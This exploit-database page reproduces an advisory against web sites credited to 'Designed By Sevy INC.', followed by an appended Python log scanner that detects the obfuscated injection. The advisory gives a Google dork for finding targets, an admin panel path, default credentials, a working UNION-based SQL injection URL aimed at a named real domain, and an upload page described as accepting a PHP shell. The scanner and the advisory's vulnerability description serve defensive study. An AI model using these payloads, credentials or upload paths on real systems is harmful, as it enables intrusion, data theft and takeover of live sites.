Designed By Sevy INC. - SQL Injection Vulnerability, Unrestricted File Upload Vulnerability and Defa

CVE: Not specified
Category: CWE-89, CWE-434
Price: Not specified
Severity: High
Author: Sevy Inc.
Risk: High
Exploitation Type: Remote
Date: 2022-07-06
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070018

Below is a copy:

Designed By Sevy INC. - SQL Injection Vulnerability, Unrestricted File Upload Vulnerability and Default Admin Credentials
******************************************************************
#Exploit Title: Designed By Sevy INC. - SQL Injection Vulnerability, File Upload Vulnerability and Default Admin Credentials
#Date: 2022-07-06
#Exploit Author: Jayson Cabrillas San Buenaventura
#Google Dork: "Designed By Sevy INC."
#Category: webapps
#Tested On: Parrot Sec, CyberFox
 
 
Proof of Concept:
Search Google dork: "Designed By Sevy INC."


## Admin Panel:

https://site.com/iadmin


## Default Admin Creds:

user: admin
pass: admin

user: emp
pass: emp


### SQLi Demo :

https://adroithrs.com/job-detail.php?id=-66'+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,DATABASE(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+


### File Upload Demo :

Go to the link below, then you can upload your shell / PHP shell directly without bypassing or tampering with data.
 

https://adroithrs.com/iadmin/team_master.php?uid=20


****************************************************************** 
#Discovered by: Jayson Cabrillas San Buenaventura
#Facebook: Jayson Cabrillas Cabrillas San Buenaventura
#Email: [email protected]
******************************************************************
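
The SQLi demo above wraps its keywords in MySQL versioned comments (/*!50000UNION*/), which MySQL executes but a plain "union select" match in a WAF rule or log search does not see. The following is an added detection example, not part of the original advisory: it unwraps those comments before matching. The Apache-style log format, the IP addresses and the shortened column list in the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL runs the body of /*!NNNNN ... */ versioned comments as SQL, so unwrap
# them (keep the body); ordinary /* ... */ comments act as whitespace.
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b", re.I)
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Reduce a decoded parameter value to the SQL text MySQL would parse."""
    value = _VERSIONED.sub(r" \1 ", value)
    value = _COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def suspicious_params(request_target):
    """Return [(name, normalized_value)] for query parameters carrying UNION SELECT."""
    hits = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        norm = normalize(value)  # parse_qsl has already decoded %xx and '+'
        if _UNION_SELECT.search(norm):
            hits.append((name, norm))
    return hits

def scan(lines):
    """Return [(line_number, param, normalized_value)] for matching log lines."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = _REQUEST.search(line)
        if match:
            findings.extend((number, n, v) for n, v in suspicious_params(match.group(1)))
    return findings

# Constructed sample access log (documentation IP range, shortened column list).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2022:10:00:01 +0000] "GET /job-detail.php?id=66 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Jul/2022:10:00:05 +0000] "GET /job-detail.php?id=-66%27+/*!50000UNION*/'
    '+/*!50000SELECT*/+1,2,3,DATABASE(),5--+ HTTP/1.1" 200 4980',
    '203.0.113.7 - - [06/Jul/2022:10:00:09 +0000] "GET /search.php?q=student+union+jobs HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

This is a log-review heuristic for the obfuscation shown in the demo; the CWE-89 fix itself belongs in the query code behind job-detail.php.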

Copyright ©2024 Exploitalert.